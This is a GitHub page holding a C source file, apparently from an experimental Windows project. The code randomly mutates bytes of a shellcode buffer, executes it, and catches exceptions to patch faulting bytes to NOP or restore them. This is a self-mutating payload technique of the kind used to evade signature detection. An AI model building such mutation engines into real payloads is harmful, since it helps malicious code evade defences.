Unicorn2_Win32/Mutation.c at master · UEFI-code/Unicorn2_Win32 · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
#include <stdio.h>
#include <Windows.h>

#include "Unicorn2.h"

UINT8 BackupBuf[x86MaxInsLen] = { 0x0 };

LONG revert_code_handle(EXCEPTION_POINTERS* ep)
{
    UINT8 *RIP = (UINT8*)ep->ContextRecord->Rip;
    printf("Exception Caught! RIP = %p\n", (void*)RIP);
    switch (ep->ExceptionRecord->ExceptionCode)
    {
        case EXCEPTION_ILLEGAL_INSTRUCTION:
            printf("- Illegal Instruction Exception Caught!\n");
            break;
        case EXCEPTION_PRIV_INSTRUCTION:
            printf("- Privileged Instruction Exception Caught!\n");
            break;
        case EXCEPTION_INT_DIVIDE_BY_ZERO:
            printf("- Divide By Zero Exception Caught!\n");
            break;
        case EXCEPTION_BREAKPOINT:
            printf("- Breakpoint Exception Caught!\n");
            break;
        case EXCEPTION_ACCESS_VIOLATION:
            printf("- Access Violation Exception Caught!\n");
            break;
        default:
            printf("- Other Exception Caught! Code: 0x%X\n", ep->ExceptionRecord->ExceptionCode);
    }
    if (RIP >= nextPayloadBuf && RIP < nextPayloadBuf + NextPayloadSize)
    {
        printf("    - Lucky, RIP still in range, patch: %x -> NOP\n", *RIP);
        *RIP = 0x90; // NOP
    }
    else
    {
        printf("    - Oh no, RIP out of range, revert code\n");
        for(int i=0; i<x86MaxInsLen; i++)
        {
            nextPayloadBuf[MuPos + i] = BackupBuf[i];
        }
    }
    return EXCEPTION_EXECUTE_HANDLER;
}

void MuNxtPayload()
{
    for(int count=0; count<1024; count++)
    {
        printf("Finding Liveable Mutation Position...\n");
        MuWatchDog = time(NULL);
        MuPos = Get_Hardware_Rand() % (NextPayloadSize - 8 - x86MaxInsLen) + 8; // Keep first 8 bytes
        for(int i=0; i<x86MaxInsLen; i++)
        {
            BackupBuf[i] = nextPayloadBuf[MuPos + i];
            nextPayloadBuf[MuPos + i] = Get_Hardware_Rand() & 0xFF;
            if (nextPayloadBuf[MuPos + i] == 0xC3)
            {
                printf("revert RET instruction\n");
                nextPayloadBuf[MuPos + i] = BackupBuf[i];
            }
        }
        __try
        {
            ((void(*)())(nextPayloadBuf + 8))();
            printf("Mutation Success @ 0x%X\n", MuPos);
            return;
        }
        __except(revert_code_handle(GetExceptionInformation()))
        {
            printf("Shellcode Ran Into Exception, Handled\n");
        }
    }
    printf("Mutation Failed: max trial exceed\n");
}